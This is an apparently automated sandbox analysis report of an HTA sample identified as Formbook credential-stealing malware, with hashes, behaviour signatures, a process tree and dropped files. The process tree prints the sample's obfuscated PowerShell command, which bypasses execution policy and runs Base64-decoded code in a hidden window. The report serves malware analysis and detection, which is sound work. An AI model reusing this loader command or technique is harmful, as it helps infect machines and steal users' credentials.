Analysis

  • max time kernel
    147s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    23-09-2024 18:14

General

  • Target

    f691fb2c2b5183a496711a5b78b575ce.hta

  • Size

    115KB

  • MD5

    f691fb2c2b5183a496711a5b78b575ce

  • SHA1

    ce9603dd85d843e4fd9fa66843f46ca5ece4e260

  • SHA256

    1c7d8ace58257e970e2f7738886c596d8189f85cef9127dba9b324735f506821

  • SHA512

    ce1e7a6b64b0d14d1d42ddf134d5db74aa8a17c6945c32f17829fbce7f309bd8f34ac1d750548c66c1cf4dcbd234531c6f57e354ac5f605331d39a57d9bb11ba

  • SSDEEP

    96:Ea+M7iHLlFPiJSHLqFPiJGkpmfORxcHLoHLDFPiJTHLQcAT:Ea+QiHJFPlHOFPhLHsHfFPmHcT

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

j62t

Decoy


Signatures

  • Formbook

    Formbook is an information-stealing malware family that harvests credentials and other data from infected hosts.

  • Formbook payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1220
    • C:\Windows\SysWOW64\mshta.exe
      C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\f691fb2c2b5183a496711a5b78b575ce.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c powERShell -eX BYPAsS -nOp -w 1 -c DEVICeCrEDEntiaLdEPlOYment.eXe ; Iex($(IEx('[SySTEM.TEXT.ENCoDinG]'+[chAR]0X3A+[CHaR]58+'uTf8.gEtstRing([SySTEM.CONveRT]'+[cHar]58+[cHAr]0x3A+'FROMBaSE64STRing('+[chAR]0x22+'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'+[cHaR]34+'))')))"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powERShell -eX BYPAsS -nOp -w 1 -c DEVICeCrEDEntiaLdEPlOYment.eXe ; Iex($(IEx('[SySTEM.TEXT.ENCoDinG]'+[chAR]0X3A+[CHaR]58+'uTf8.gEtstRing([SySTEM.CONveRT]'+[cHar]58+[cHAr]0x3A+'FROMBaSE64STRing('+[chAR]0x22+'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'+[cHaR]34+'))')))"
          4⤵
          • Blocklisted process makes network request
          • Evasion via Device Credential Deployment
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k3rpkvm_.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2592
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC79D1.tmp"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1960
          • C:\Users\Admin\AppData\Roaming\audiodg.exe
            "C:\Users\Admin\AppData\Roaming\audiodg.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1208
            • C:\Users\Admin\AppData\Roaming\audiodg.exe
              "C:\Users\Admin\AppData\Roaming\audiodg.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              PID:568
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Roaming\audiodg.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2968

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES79D2.tmp

    Filesize

    1KB

    MD5

    86a49c4ef7013c7e4f5f509f367ba73a

    SHA1

    1021594f46fa4bac5bcfa85a2a10077f6d20928e

    SHA256

    5480a81b2d966a20a0ff8e3cd6581e7245c30f6508e1b4263e60f16a09803f5e

    SHA512

    41b4b47021bb9464368a85ed04bfe85480dda6c9ce829297d32495ef61c406f7377d44b4a7928e0daadefa191d67b0fabee8d577ded4a9c9cebe3dd83292d89b

  • C:\Users\Admin\AppData\Local\Temp\k3rpkvm_.dll

    Filesize

    3KB

    MD5

    65119072fec74cf404e38368ceb02ee3

    SHA1

    f99cc74d57e062bafce51f4cc9ab4114c035bdb5

    SHA256

    f7a0d350f038cc1aea90d0d2ec9bc93352df7e000f05914bb86cbe90db3c4b67

    SHA512

    5220ab3a691f59035550b822d2875bc92f5612cdd4ffd4cfbc0123afec2fb0fc177b5d826e6c59d346bfd885734140cecac0140ac1beb6f05caaace07098f6db

  • C:\Users\Admin\AppData\Local\Temp\k3rpkvm_.pdb

    Filesize

    7KB

    MD5

    d23c0fecddd811453c9ea2cd3b404471

    SHA1

    5491247757fc36a01b299bf512220c5b947130a3

    SHA256

    3f21b923c134d05a11cda389f42d8b716ad0b1351340ef3897bb80999f5672ab

    SHA512

    7a429682bcd50c69cf91d4ffde86a6a0ed5976686b2a1e7578a5631f335b5ba655871c60a32b7a957edb8186007621e7f210427c3f5e955c7bfb081b0901b3a2

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC79D1.tmp

    Filesize

    652B

    MD5

    dbe4a136cfdc800d9d4a0c8c81aab839

    SHA1

    aed629f84dd35f874ef587712fb1f3e98c027be6

    SHA256

    21689d6356fac95aeb0e75526b43f9f22e41d0ced1fa0c00e23ec688cdca8ea8

    SHA512

    d096813c8a44677fb179aea029701edd90791b74dba544ee30bc3eeba8228352e603199adc77224e34befcecec942636916ab2670eb9f40431baab482eff530e

  • \??\c:\Users\Admin\AppData\Local\Temp\k3rpkvm_.0.cs

    Filesize

    467B

    MD5

    deec2cbeef08f5d6a07a39fd4189249f

    SHA1

    174ed8f143660c9aba228b6a5dbe05bd39e0372c

    SHA256

    b670540a59065657d3544089a447a84d4b8a1bc8004be85311d3fff5ae0ea6ad

    SHA512

    54ffbed2df5ee7fd1a014f58147375bfab9794b1339b18a78d004138926835aea1e99ff3ae35acdcb39a0dda05fdddabec891ad8b1e22f79f3ffa4cf595d452d

  • \??\c:\Users\Admin\AppData\Local\Temp\k3rpkvm_.cmdline

    Filesize

    309B

    MD5

    035364ddefa18ca3c135e59bd34487c3

    SHA1

    8629aa3f6450631f09d0674e62f099c577a6dffc

    SHA256

    82d993ab3abc79a75a098e007d8655c639966ccb3cd3a7026c4c922e2c3c9e19

    SHA512

    3806f022e7fb396f932c67eaef51f9a6f5fb22ad89a5b83bd142417d52225b6344be7db414f62f52fe41fa57075f2b8c2e57acca251941fd19d32a5d2186e418

  • \Users\Admin\AppData\Roaming\audiodg.exe

    Filesize

    770KB

    MD5

    13026754941320e654b4d10b8c7c37d4

    SHA1

    0c355a2c24b09bd90e84bc58c842176d0b18569f

    SHA256

    58cdcd2f49080d4471ffd169eb6cfe86f9efae01e45423492d0e31a4db510d60

    SHA512

    77cc08168c0a860f56157a0926c7cee8bd18531a85869e38b1fb585e20b03e11c669a7d1a4cf002e7f06a46e8b47411c0393913e161cc05a4717db011b799279

  • memory/568-47-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/568-43-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/568-48-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/568-45-0x0000000000400000-0x000000000042F000-memory.dmp

    Filesize

    188KB

  • memory/1208-40-0x00000000002F0000-0x0000000000302000-memory.dmp

    Filesize

    72KB

  • memory/1208-41-0x0000000004B30000-0x0000000004BA6000-memory.dmp

    Filesize

    472KB

  • memory/1208-39-0x0000000000FD0000-0x0000000001096000-memory.dmp

    Filesize

    792KB

  • memory/1220-51-0x0000000003D90000-0x0000000003F90000-memory.dmp

    Filesize

    2.0MB

  • memory/2268-52-0x0000000000990000-0x00000000009A4000-memory.dmp

    Filesize

    80KB

  • memory/2268-54-0x0000000000990000-0x00000000009A4000-memory.dmp

    Filesize

    80KB

  • memory/2268-55-0x00000000000D0000-0x00000000000FF000-memory.dmp

    Filesize

    188KB